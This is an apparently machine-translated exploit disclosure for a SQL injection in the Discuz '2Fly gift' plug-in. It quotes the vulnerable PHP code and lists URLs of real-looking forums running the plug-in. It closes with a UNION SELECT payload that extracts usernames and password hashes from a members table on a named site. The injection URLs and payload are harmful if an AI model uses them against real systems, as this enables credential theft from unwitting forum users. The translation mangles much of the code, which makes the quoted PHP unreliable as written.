Discuz plug-in account distribution system injection 0 day

Plug-in name: 2Fly gift (serial number) Issuing System
Vulnerability file: 2fly_gift.php (the latest version only)
Author: CN. Tnik & Tojen (fellow villagers)

Code Analysis:
It is mainly because the gameid parameter is not filtered, leading to injection.
1. gameid under the output branch General browse copy code Print Code
$ Query = $ db-> query ("Select * FROM '{$ tablepre} 2fly_gift 'where 'id' = $ gameid LIMIT 1 ");
$ Game = $ db-> fetch_array ($ query );

$ Query = $ db-> query ("Select * FROM '{$ tablepre} 2fly_gift 'where 'id' = $ gameid LIMIT 1 ");
$ Game = $ db-> fetch_array ($ query)
Http://www.klcwsj.com/2fly_gift.php? Action = output & gameid = 45
Http://bbs.yeswan.com/2fly_gift.php? Action = output & gameid = 16
But there is no data display bit after union, but no data
2. The gameid under the branch of ipvsors is not filtered: normal browsing, copying, and printing code
$ Query = $ db-> query ("Select id, good_names, acc, total, remain, record, expiration FROM '{$ tablepre} 2fly_gift' Where 'id' = $ gameid LIMIT 1 ");
$ Game = $ db-> fetch_array ($ query );

$ Query = $ db-> query ("Select id, good_names, acc, total, remain, record, expiration FROM '{$ tablepre} 2fly_gift' Where 'id' = $ gameid LIMIT 1 ");
$ Game = $ db-> fetch_array ($ query); http://bbs.yeswan.com/2fly_gift... ecord & gameid = 17
Obvious injection, which was originally intended to be usable, but appeared unexpectedly: Common browsing, copying, and printing code
$ Recordb = explode (||, $ game [record]);
$ Acc2 = explode ("", $ game [acc]);
$ Remain = $ game [remain];
$ Remain2 = $ game [remain] + 1;

/* Analyze the uid of the member you have received */
Foreach ($ recordb as $ recordnow)
{
$ Recordc = explode (_, $ recordnow );
$ Recordd [] = substr ($ recordc [0], 1 );
$ TsbuserID [] = $ recordc [0];
$ Tsbfafang [] = $ recordc [1];
$ RandomPW [] = $ recordc [2];
$ CheckboxTsb [] = $ recordc [3];
If (substr ($ recordc [0], 1 )! =)
{
If ($ recordc [0])
$ Uids. =,. substr ($ recordc [0], 1 );
}

}


$ Table. = "<form name = form1 method = post action = 2fly_gift.php? Action = extends SORS & pages = view_record_edit & gameid = ".
$ Gameid. "> ";

/* Read the user name */
$ Uidss = array ();
$ Uidquery = $ db-> query ("Select uid, username FROM {$ tablepre} members Where uid IN (".
Substr ($ uids, 1). ") orDER BY uid ASC ");

$ Recordb = explode (||, $ game [record]);
$ Acc2 = explode ("", $ game [acc]);
$ Remain = $ game [remain];
$ Remain2 = $ game [remain] + 1;

/* Analyze the uid of the member you have received */
Foreach ($ recordb as $ recordnow)
{
$ Recordc = explode (_, $ recordnow );
$ Recordd [] = substr ($ recordc [0], 1 );
$ TsbuserID [] = $ recordc [0];
$ Tsbfafang [] = $ recordc [1];
$ RandomPW [] = $ recordc [2];
$ CheckboxTsb [] = $ recordc [3];
If (substr ($ recordc [0], 1 )! =)
{
If ($ recordc [0])
$ Uids. =,. substr ($ recordc [0], 1 );
}

}

$ Table. = "<form name = form1 method = post action = 2fly_gift.php? Action = extends SORS & pages = view_record_edit & gameid = ".
$ Gameid. "> ";

/* Read the user name */
$ Uidss = array ();
$ Uidquery = $ db-> query ("Select uid, username FROM {$ tablepre} members Where uid IN (".
Substr ($ uids, 1 ). ") orDER BY uid ASC"); as long as and 1 = 2 $ uids is added, it is null. An error occurs. It is blocked here, and no data is displayed, if you don't talk about it in other places, check if there are any good methods to break through. There are some update SQL statements in it, and you don't know if it can be used.
However, previous versions are still available:
There is a content Branch:
Http://www.iacct.cn/2fly_gift.php? Pages = content & gameid = 16 and 1 = 2 union select 1, 2, 3, 4, concat (username,

0x3a, password), 6, 7, 8, 9, 10, 11, 12, 13, 16, 17, 18, 19, 20, 21, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37 from week
Password burst